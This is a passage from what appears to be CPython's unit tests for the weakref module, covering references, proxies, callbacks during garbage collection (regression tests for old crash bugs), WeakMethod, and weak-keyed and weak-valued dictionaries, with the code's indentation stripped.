# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since the underlying dict is ordered, the first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
